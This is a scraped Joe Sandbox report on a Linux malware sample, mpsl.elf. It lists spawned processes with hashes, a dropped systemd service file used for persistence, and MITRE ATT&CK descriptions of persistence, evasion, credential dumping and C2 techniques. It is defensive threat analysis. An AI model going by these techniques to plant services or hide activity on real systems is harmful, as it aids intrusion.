Chronological Activities

Analysis Process: snapd-env-generator PID: 5524, Parent PID: 5523

General

Start time (UTC):	00:09:35
Start date (UTC):	07/01/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: gnome-session-binary PID: 5545, Parent PID: 1588

General

Start time (UTC):	00:09:36
Start date (UTC):	07/01/2025
Path:	/usr/libexec/gnome-session-binary
Arguments:	-
File size:	334664 bytes
MD5 hash:	d9b90be4f7db60cb3c2d3da6a1d31bfb

Chronological Activities

Analysis Process: sh PID: 5545, Parent PID: 1588

General

Start time (UTC):	00:09:36
Start date (UTC):	07/01/2025
Path:	/bin/sh
Arguments:	/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: gsd-rfkill PID: 5545, Parent PID: 1588

General

Start time (UTC):	00:09:36
Start date (UTC):	07/01/2025
Path:	/usr/libexec/gsd-rfkill
Arguments:	/usr/libexec/gsd-rfkill
File size:	51808 bytes
MD5 hash:	88a16a3c0aba1759358c06215ecfb5cc

Chronological Activities

Analysis Process: systemd PID: 5550, Parent PID: 1

General

Start time (UTC):	00:09:37
Start date (UTC):	07/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: systemd-hostnamed PID: 5550, Parent PID: 1

General

Start time (UTC):	00:09:37
Start date (UTC):	07/01/2025
Path:	/lib/systemd/systemd-hostnamed
Arguments:	/lib/systemd/systemd-hostnamed
File size:	35040 bytes
MD5 hash:	2cc8a5576629a2d5bd98e49a4b8bef65

Chronological Activities

Analysis Process: gdm3 PID: 5681, Parent PID: 1400

General

Start time (UTC):	00:09:38
Start date (UTC):	07/01/2025
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Chronological Activities

Analysis Process: Default PID: 5681, Parent PID: 1400

General

Start time (UTC):	00:09:38
Start date (UTC):	07/01/2025
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: gdm3 PID: 5682, Parent PID: 1400

General

Start time (UTC):	00:09:38
Start date (UTC):	07/01/2025
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Chronological Activities

Analysis Process: Default PID: 5682, Parent PID: 1400

General

Start time (UTC):	00:09:38
Start date (UTC):	07/01/2025
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemd PID: 5687, Parent PID: 1

General

Start time (UTC):	00:09:48
Start date (UTC):	07/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: systemd-user-runtime-dir PID: 5687, Parent PID: 1

General

Start time (UTC):	00:09:48
Start date (UTC):	07/01/2025
Path:	/lib/systemd/systemd-user-runtime-dir
Arguments:	/lib/systemd/systemd-user-runtime-dir stop 127
File size:	22672 bytes
MD5 hash:	d55f4b0847f88131dbcfb07435178e54

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.
Tactics:	Impact
Data Sources:	Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report mpsl.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/systemd/system/startup_command.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.Nyhh0c (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: mpsl.elf PID: 5502, Parent PID: 5428

General

Chronological Activities

Analysis Process: mpsl.elf PID: 5504, Parent PID: 5502

General

Chronological Activities

Analysis Process: mpsl.elf PID: 5506, Parent PID: 5504

General

Chronological Activities

Analysis Process: mpsl.elf PID: 5507, Parent PID: 5504

General

Chronological Activities

Analysis Process: mpsl.elf PID: 5512, Parent PID: 5507

General

Chronological Activities

Linux Analysis Report
mpsl.elf